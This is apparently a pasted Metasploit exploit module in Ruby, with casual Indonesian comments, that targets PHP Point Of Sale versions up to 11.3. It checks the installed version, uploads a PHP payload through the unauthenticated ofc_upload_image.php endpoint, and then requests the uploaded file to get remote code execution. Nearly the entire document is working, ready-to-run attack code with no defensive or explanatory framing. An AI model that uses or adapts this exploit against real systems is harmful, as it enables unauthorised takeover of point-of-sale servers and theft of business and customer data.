tes -_-

1. require 'msf/core'
2.  
3. class Metasploit3 < Msf::Exploit::Remote
4.   Rank = ExcellentRanking
5.  
6.   include Msf::Exploit::Remote::HttpClient
7.   include Msf::Exploit::FileDropper
8.  
9.   def initialize(info={})
10.     super(update_info(info,
11.       'Name'           => "Php Point of Sale Remote Code Execution",
12.       'Description'    => %q{
13. just for iseng :D
14.       },
15.       'License'         => MSF_LICENSE,
16.       'Author'          =>
17.         [
18.           'Gabby', # Vulnerability Discovery, Module Auth
19.         ],
20.       'References'      =>
21.         [
22.           [ 'URL', 'http://packetstormsecurity.com/files/123661/PHP-Point-Of-Sale-10.x-11.x-12.x-Remote-Code-Execution.html' ]
23.         ],
24.       'Platform'        => ['php'],
25.       'Arch'            => ARCH_PHP,
26.       'Targets'         =>
27.         [
28.           ['PHP Point Of Sale', {}]
29.         ],
30.       'Privileged'      => false,
31.       'DisclosureDate'  => "18 Oct 2013",
32.       'DefaultTarget'   => 0))
33.  
34.     register_options(
35.       [
36.        OptString.new('TARGETURI', [true, 'The base path to the PHP Point Of Sale application', '/'])
37.       ], self.class)
38.   end
39.  
40.   def uri
41.     return target_uri.path
42.   end
43.  
44.   def check
45.     # Check version
46.     peer = "#{rhost}:#{rport}"
47.  
48.     print_status("#{peer} - Trying to detect installed version")
49.  
50.     res = send_request_cgi({
51.      'method' => 'GET',
52.      'uri'    => normalize_uri(uri, "")
53.     })
54.  
55.     if res and res.code == 200 and res.body =~ /PHP Point Of Sale version (\d+\.\d+)/
56.       version = $1
57.     else
58.       return Exploit::CheckCode::Unknown
59.     end
60.  
61.     print_status("#{peer} - Version #{version} detected")
62.  
63.     if version > "11.3"
64.       return Exploit::CheckCode::Safe
65.     else
66.       return Exploit::CheckCode::Vulnerable
67.     end
68.  
69.     return Exploit::CheckCode::Safe
70.   end
71.  
72.   def exploit
73.     peer = "#{rhost}:#{rport}"
74.     payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php"
75.  
76.     print_status("#{peer} - Uploading payload [ #{payload_name} ]")
77.     res = send_request_cgi({
78.       'method' => 'POST',
79.       'uri'    => normalize_uri(uri, "application", "libraries", "ofc-library", "ofc_upload_image.php"),
80.       'headers'  => { 'Content-Type' => 'text/plain' },
81.       'vars_get' => { 'name' => payload_name },
82.       'data'  => payload.encoded
83.     })
84.  
85.     # If the server returns 200 we assume we uploaded the malicious
86.     # file successfully
87.     if not res or res.code != 200 or res.body !~ /Saving your image to: \.\.\/tmp-upload-images\/(#{payload_name})/ or res.body =~ /HTTP_RAW_POST_DATA/
88.       fail_with(Failure::None, "#{peer} - File gak keaplut, :3 aborting!")
89.     end
90.  
91.     register_files_for_cleanup(payload_name)
92.  
93.     print_status("#{peer} - Executing Payload [ #{uri}/application/libraries/tmp-upload-images/#{payload_name} ]" )
94.     res = send_request_cgi({
95.       'method' => 'GET',
96.       'uri'    => normalize_uri(uri, "application", "libraries", "tmp-upload-images", payload_name)
97.     })
98.  
99.     # If we don't get a 200 when we request our malicious payload, we suspect
100.     # we don't have a shell, either.
101.     if res and res.code != 200
102.       print_error("#{peer} - Unexpected response, probably the exploit failed")
103.     end
104.  
105.   end
106.  
107. end